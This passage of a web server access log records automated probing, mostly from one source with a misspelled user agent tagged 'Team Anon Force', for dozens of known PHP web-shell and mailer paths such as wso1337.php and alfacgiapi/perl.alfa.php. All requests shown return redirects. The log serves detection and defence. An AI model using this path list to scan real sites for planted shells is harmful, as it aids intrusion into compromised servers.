94.16.113.252 - - [12/Aug/2025:06:52:34 -0400] "GET /hello.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:52:38 -0400] "GET /ok.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:52:42 -0400] "GET /if.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:52:45 -0400] "GET /kk.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 209.38.125.40 - - [12/Aug/2025:06:52:46 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:06:52:46 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:06:52:46 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:06:52:46 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 94.16.113.252 - - [12/Aug/2025:06:52:49 -0400] "GET /mrjn.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:52:53 -0400] "GET /kn.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:52:57 -0400] "GET /3301.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:53:01 -0400] "GET /leaf.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:53:06 -0400] "GET /alex.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:53:10 -0400] "GET /mailer.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:53:15 -0400] "GET /anone.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:53:21 -0400] "GET /wp-configer.php HTTP/1.1" 301 250 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:53:27 -0400] "GET /wp-ad.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:53:31 -0400] "GET /send.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:53:35 -0400] "GET /3.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:53:39 -0400] "GET /.wp-cache.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:53:43 -0400] "GET /sendmail.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:53:47 -0400] "GET /rahma.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:53:52 -0400] "GET /nasgor.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:53:56 -0400] "GET /wp-confirm.php HTTP/1.1" 301 249 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:54:01 -0400] "GET /alfa123.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:54:06 -0400] "GET /upload.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:54:10 -0400] "GET /bypass.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:54:13 -0400] "GET /wp-one.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:54:16 -0400] "GET /alexus.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:54:19 -0400] "GET /wso1337.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:54:23 -0400] "GET /1337.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:54:26 -0400] "GET /blog.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:54:30 -0400] "GET /it.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:54:34 -0400] "GET /kiss.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:54:37 -0400] "GET /0.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:54:40 -0400] "GET /wp2.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:54:44 -0400] "GET /owl.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:54:48 -0400] "GET /vuln.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:54:51 -0400] "GET /ohayo.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:54:55 -0400] "GET /wp-admin.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:54:58 -0400] "GET /cms.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:55:02 -0400] "GET /wp-uploads.php HTTP/1.1" 301 249 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:55:07 -0400] "GET /Gel.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:55:12 -0400] "GET /41.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:55:15 -0400] "GET /4price.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:55:18 -0400] "GET /MARIJUANA.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:55:22 -0400] "GET /marijuana.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:55:27 -0400] "GET /.fk.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:55:30 -0400] "GET /XxX.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:55:34 -0400] "GET /alexuse.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:55:37 -0400] "GET /Sendemail.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 149.102.237.41 - - [12/Aug/2025:06:55:39 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:06:55:39 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:06:55:39 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:06:55:39 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:06:55:41 -0400] "GET /content.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:55:44 -0400] "GET /leafmailer2.8.php HTTP/1.1" 301 252 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:55:48 -0400] "GET /olu.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:55:52 -0400] "GET /alexusmailer%202.0.php HTTP/1.1" 301 257 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:55:55 -0400] "GET /rss.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:55:59 -0400] "GET /alexus-mailer.php HTTP/1.1" 301 252 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:56:03 -0400] "GET /wp-file.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:56:06 -0400] "GET /wso2.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:56:10 -0400] "GET /wso1.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:56:15 -0400] "GET /olux.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.245.101 - - [12/Aug/2025:06:56:19 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:06:56:19 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:06:56:19 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:06:56:19 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:06:56:20 -0400] "GET /wp-info.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:56:23 -0400] "GET /xl.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:56:27 -0400] "GET /wp-confiig.php HTTP/1.1" 301 249 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:56:30 -0400] "GET /file-manager.php HTTP/1.1" 301 251 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:56:35 -0400] "GET /uploader.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:56:39 -0400] "GET /leafmailer.php HTTP/1.1" 301 249 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:56:42 -0400] "GET /ALFA_DATA/alfacgiapi/perl.alfa.php HTTP/1.1" 301 269 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:56:46 -0400] "GET /.well-known/ALFA_DATA/alfacgiapi/perl.alfa.php HTTP/1.1" 301 281 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:56:49 -0400] "GET /tmp_images/alfacgiapi/perl.alfa.php HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:56:52 -0400] "GET /wp-admin/alfacgiapi/perl.alfa.php HTTP/1.1" 301 268 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:56:55 -0400] "GET /wp-content/alfacgiapi/perl.alfa.php HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:57:00 -0400] "GET /wp-includes/alfacgiapi/perl.alfa.php HTTP/1.1" 301 271 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:57:04 -0400] "GET /alfacgiapi/perl.alfa.php HTTP/1.1" 301 259 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:57:07 -0400] "GET /css/ALFA_DATA/alfacgiapi/perl.alfa.php HTTP/1.1" 301 273 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:57:11 -0400] "GET /files/ALFA_DATA/alfacgiapi/perl.alfa.php HTTP/1.1" 301 275 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:57:15 -0400] "GET /images/ALFA_DATA/alfacgiapi/perl.alfa.php HTTP/1.1" 301 276 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:57:19 -0400] "GET /ALFA_DATA/alfacgiapi/perl.alfa.php HTTP/1.1" 301 269 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:57:22 -0400] "GET /wp-admin/ALFA_DATA/alfacgiapi/perl.alfa.php HTTP/1.1" 301 278 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:57:27 -0400] "GET /wp-content/ALFA_DATA/alfacgiapi/perl.alfa.php HTTP/1.1" 301 280 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:57:30 -0400] "GET /wp-includes/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 277 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:57:33 -0400] "GET /date.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 94.16.113.252 - - [12/Aug/2025:06:57:37 -0400] "GET /about.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 